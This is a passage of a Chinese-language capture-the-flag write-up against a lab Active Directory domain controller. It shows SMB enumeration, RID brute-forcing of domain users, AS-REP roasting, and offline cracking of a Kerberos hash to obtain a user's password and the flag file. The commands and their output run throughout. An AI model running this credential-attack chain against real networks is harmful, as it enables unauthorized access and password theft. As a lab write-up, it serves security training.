share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\charlie" \/\/$IP\/IPC$\nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\nNT_STATUS_NO_SUCH_FILE listing \\*\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\charlie" \/\/$IP\/NETLOGON\nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Sat Jun 15 15:21:21 2024\n .. D 0 Sat Jun 15 15:30:47 2024\n\n 12942591 blocks of size 4096. 10793162 blocks available\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\charlie" \/\/$IP\/SYSVOL \nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Sat Jun 15 15:21:21 2024\n .. D 0 Sat Jun 15 15:21:21 2024\n SOUPEDECODE.LOCAL Dr 0 Sat Jun 15 15:21:21 2024\n\n 12942591 blocks of size 4096. 10793162 blocks available \nsmb: \\> cd SOUPEDECODE.LOCAL\\\nsmb: \\SOUPEDECODE.LOCAL\\> ls\n . D 0 Sat Jun 15 15:30:47 2024\n .. D 0 Sat Jun 15 15:21:21 2024\n DfsrPrivate DHSr 0 Sat Jun 15 15:30:47 2024\n Policies D 0 Sat Jun 15 15:21:30 2024\n scripts D 0 Sat Jun 15 15:21:21 2024\n\n 12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\> cd scripts\\\nsmb: \\SOUPEDECODE.LOCAL\\scripts\\> ls\n . D 0 Sat Jun 15 15:21:21 2024\n .. D 0 Sat Jun 15 15:30:47 2024\n\n 12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\scripts\\> cd ..\/Policies\\\nsmb: \\SOUPEDECODE.LOCAL\\Policies\\> ls\n . D 0 Sat Jun 15 15:21:30 2024\n .. D 0 Sat Jun 15 15:30:47 2024\n {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jun 15 15:21:30 2024\n {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jun 15 15:21:30 2024\n\n 12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\Policies\\> cd ..\/DfsrPrivate\\\ncd \\SOUPEDECODE.LOCAL\\DfsrPrivate\\: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\nRID\u7206\u7834\u7528\u6237<\/h3>\n
\n
\u5de5\u5177\u4e00\uff1anetexec<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d 'SOUPEDECODE.LOCAL' -u 'charlie' -p 'charlie' --rid-brute\nSMB 192.168.10.107 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.107 445 DC01 [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB 192.168.10.107 445 DC01 498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 500: SOUPEDECODE\\Administrator (SidTypeUser)\nSMB 192.168.10.107 445 DC01 501: SOUPEDECODE\\Guest (SidTypeUser)\nSMB 192.168.10.107 445 DC01 502: SOUPEDECODE\\krbtgt (SidTypeUser)\nSMB 192.168.10.107 445 DC01 512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 513: SOUPEDECODE\\Domain Users (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 515: SOUPEDECODE\\Domain Computers (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 516: SOUPEDECODE\\Domain Controllers (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 517: SOUPEDECODE\\Cert Publishers (SidTypeAlias)\nSMB 192.168.10.107 445 DC01 518: SOUPEDECODE\\Schema Admins (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 519: SOUPEDECODE\\Enterprise Admins (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 520: SOUPEDECODE\\Group Policy Creator Owners (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 521: SOUPEDECODE\\Read-only Domain Controllers (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 522: SOUPEDECODE\\Cloneable Domain Controllers (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 525: SOUPEDECODE\\Protected Users (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 526: SOUPEDECODE\\Key Admins (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 527: SOUPEDECODE\\Enterprise Key Admins (SidTypeGroup)\nSMB 192.168.10.107 445 DC01 553: SOUPEDECODE\\RAS and IAS Servers (SidTypeAlias)\nSMB 192.168.10.107 445 DC01 571: SOUPEDECODE\\Allowed RODC Password Replication Group (SidTypeAlias)\nSMB 192.168.10.107 445 DC01 572: SOUPEDECODE\\Denied RODC Password Replication Group (SidTypeAlias)\nSMB 192.168.10.107 445 DC01 1000: SOUPEDECODE\\DC01$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 1101: SOUPEDECODE\\DnsAdmins (SidTypeAlias)\n----------------------------------\nSMB 192.168.10.107 445 DC01 2158: SOUPEDECODE\\PC-86$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 2159: SOUPEDECODE\\PC-87$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 2160: SOUPEDECODE\\PC-88$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 2161: SOUPEDECODE\\PC-89$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 2162: SOUPEDECODE\\PC-90$ (SidTypeUser)\nSMB 192.168.10.107 445 DC01 2164: SOUPEDECODE\\admin (SidTypeUser)<\/code><\/pre>\n\u5de5\u5177\u4e8c\uff1alookupsid<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-lookupsid 'SOUPEDECODE.LOCAL\/charlie:charlie@192.168.10.107'\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Brute forcing SIDs at 192.168.10.107\n[*] StringBinding ncacn_np:192.168.10.107[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n500: SOUPEDECODE\\Administrator (SidTypeUser)\n501: SOUPEDECODE\\Guest (SidTypeUser)\n502: SOUPEDECODE\\krbtgt (SidTypeUser)\n512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\n513: SOUPEDECODE\\Domain Users (SidTypeGroup)\n514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\n-------------<\/code><\/pre>\nASREPRoasting \u653b\u51fb<\/h3>\n
TGS<\/code> \u7968\u8bc1\uff0c\u770b\u770b\u662f\u5426\u542f\u7528\u4e86 <\/strong>Kerberos \u9884\u8ba4\u8bc1****\uff0c\u4f46\u9996\u5148\uff0c\u54b1\u4eec\u8981\u5904\u7406\u4e00\u4e0b\u4e0a\u4e00\u6b65\u5f97\u51fa\u7684\u7528\u6237\u540d\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-lookupsid 'SOUPEDECODE.LOCAL\/charlie:charlie@192.168.10.107' > riduser\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat riduser | cut -d'\\' -f2 | cut -d' ' -f1 > riduser1<\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-GetNPUsers -usersfile riduser1 -dc-ip $IP 'SOUPEDECODE.LOCAL\/charlie:charlie' > log1 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log1 | grep -v "[-]" \n\n$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:aa70c09e60ebee7fc1673c1879a2d17a$b425889aa396cb62af79319e7d12ead2ebef0dc7dd2da618ff97fa6e660db47b99fcffdecf0aa6cb6b27b07a895f5a1a60c9693cde559a5631466ec10d4d42d852f9c0d2f61fdaa3b5e90dc9ef24907290e6015660b968cdec96997baa92155e26033367235108088514407e68208d0c6dd4fead4a4bfd556c5e05ddf6a4547d8fae35710961676c54e2aae3092a6572de5c16cdab9f213381d6f9258e46a0aab14ff27e15809d6b4f12521dcd14b57acd65286d691e0296da28187c3a882695b8afd276adbbeab6f12e0b8741a5593a178fdc90e63e50911814c511ae3948e250484b1ffe3c5cf28348907641a2b43110ecfa0ed08e<\/code><\/pre>\n\n
\n
\nKerberos \u534f\u8bae\u5728\u8ba4\u8bc1\u65f6\u9ed8\u8ba4\u8981\u6c42 \u200b\u9884\u8ba4\u8bc1\uff08Pre-Authentication\uff09\u200b<\/strong>\u200b\uff1a<\/p>\n\n
\n\u82e5\u57df\u7528\u6237\u88ab\u6807\u8bb0 \u200bDo not require Kerberos preauthentication<\/code><\/strong>\u200b\uff08\u5373 UF_DONT_REQUIRE_PREAUTH<\/code> \u5c5e\u6027\uff09\uff1a<\/p>\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log1 | grep "UF_DONT" | head -n 10\n[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User jharper5 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User bxenia6 doesn't have UF_DONT_REQUIRE_PREAUTH set\n[-] User gmona7 doesn't have UF_DONT_REQUIRE_PREAUTH set<\/code><\/pre>\nASREPRoasting \u653b\u51fb<\/code>\u7684\u6761\u4ef6\uff01<\/p>\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 [MD4 HMAC-MD5 RC4 \/ PBKDF2 HMAC-SHA1 AES 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ninternet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL) \n1g 0:00:00:00 DONE (2025-06-12 11:20) 16.66g\/s 8533p\/s 8533c\/s 8533C\/s angelo..letmein\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\nzximena448:internet<\/code>\uff0c\u8fdb\u884c\u65b0\u4e00\u8f6e\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n\u5de5\u5177\u4e00\uff1anetexec<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d 'SOUPEDECODE.LOCAL' -u 'zximena448' -p 'internet' --shares\nSMB 192.168.10.107 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB 192.168.10.107 445 DC01 [+] SOUPEDECODE.LOCAL\\zximena448:internet \nSMB 192.168.10.107 445 DC01 [*] Enumerated shares\nSMB 192.168.10.107 445 DC01 Share Permissions Remark\nSMB 192.168.10.107 445 DC01 ----- ----------- ------\nSMB 192.168.10.107 445 DC01 ADMIN$ READ Remote Admin\nSMB 192.168.10.107 445 DC01 C$ READ,WRITE Default share\nSMB 192.168.10.107 445 DC01 IPC$ READ Remote IPC\nSMB 192.168.10.107 445 DC01 NETLOGON READ Logon server share \nSMB 192.168.10.107 445 DC01 SYSVOL READ Logon server share<\/code><\/pre>\n\u5de5\u5177\u4e8c\uff1asmbmap<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbmap -u zximena448 -p internet -H $IP -d workgroup\n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB \n[*] Established 1 SMB connections(s) and 1 authenticated session(s) \n\n[+] IP: 192.168.10.107:445 Name: 192.168.10.107 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n ADMIN$ READ ONLY Remote Admin\n C$ READ ONLY Default share\n IPC$ READ ONLY Remote IPC\n NETLOGON READ ONLY Logon server share \n SYSVOL READ ONLY Logon server share \n[*] Closed 1 connections <\/code><\/pre>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\zximena448" \/\/$IP\/C$ \nPassword for [SOUPEDECODE.LOCAL\\zximena448]:\nTry "help" to get a list of possible commands.\nsmb: \\> dir\n $WinREAgent DH 0 Sat Jun 15 15:19:51 2024\n Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024\n DumpStack.log.tmp AHS 12288 Fri Jun 13 02:25:18 2025\n pagefile.sys AHS 1476395008 Fri Jun 13 02:25:18 2025\n PerfLogs D 0 Sat May 8 04:15:05 2021\n Program Files DR 0 Sat Jun 15 13:54:31 2024\n Program Files (x86) D 0 Sat May 8 05:34:13 2021\n ProgramData DHn 0 Sat Jun 15 22:51:08 2024\n Recovery DHSn 0 Sat Jun 15 22:51:08 2024\n System Volume Information DHS 0 Sat Jun 15 15:02:21 2024\n Users DR 0 Mon Jun 17 14:31:08 2024\n Windows D 0 Sat Jun 15 15:21:10 2024\n\n 12942591 blocks of size 4096. 10792809 blocks available\n\nsmb: \\> cd \/Users\nsmb: \\Users\\> ls\n . DR 0 Mon Jun 17 14:31:08 2024\n .. DHS 0 Fri Jun 13 02:27:11 2025\n Administrator D 0 Sat Jun 15 15:56:40 2024\n All Users DHSrn 0 Sat May 8 04:26:16 2021\n Default DHR 0 Sat Jun 15 22:51:08 2024\n Default User DHSrn 0 Sat May 8 04:26:16 2021\n desktop.ini AHS 174 Sat May 8 04:14:03 2021\n Public DR 0 Sat Jun 15 13:54:32 2024\n zximena448 D 0 Mon Jun 17 14:30:22 2024\n\n 12942591 blocks of size 4096. 10792623 blocks available\nsmb: \\Users\\> cd zximena448\\\nsmb: \\Users\\zximena448\\> cd desktop\nsmb: \\Users\\zximena448\\desktop\\> ls\n . DR 0 Mon Jun 17 14:31:24 2024\n .. D 0 Mon Jun 17 14:30:22 2024\n desktop.ini AHS 282 Mon Jun 17 14:30:22 2024\n user.txt A 33 Wed Jun 12 16:01:30 2024\n\n 12942591 blocks of size 4096. 10792623 blocks available\nsmb: \\Users\\zximena448\\desktop\\> get user.txt\ngetting file \\Users\\zximena448\\desktop\\user.txt of size 33 as user.txt (0.2 KiloBytes\/sec) (average 0.2 KiloBytes\/sec)\nsmb: \\Users\\zximena448\\desktop\\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat user.txt \n2fe79eb0e02ecd4dd2833cfcbbdb504c<\/code><\/pre>\n\u63d0\u6743<\/h2>\n
LDAP\u4fe1\u606f\u641c\u96c6<\/h3>\n
![\"image-20250613000317597\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122426.png\")
<\/div><\/p>\n![\"image-20250613000416785\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122427.png\")
<\/div><\/p>\n![\"image-20250613004030970\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122428.png\")
<\/div><\/p>\n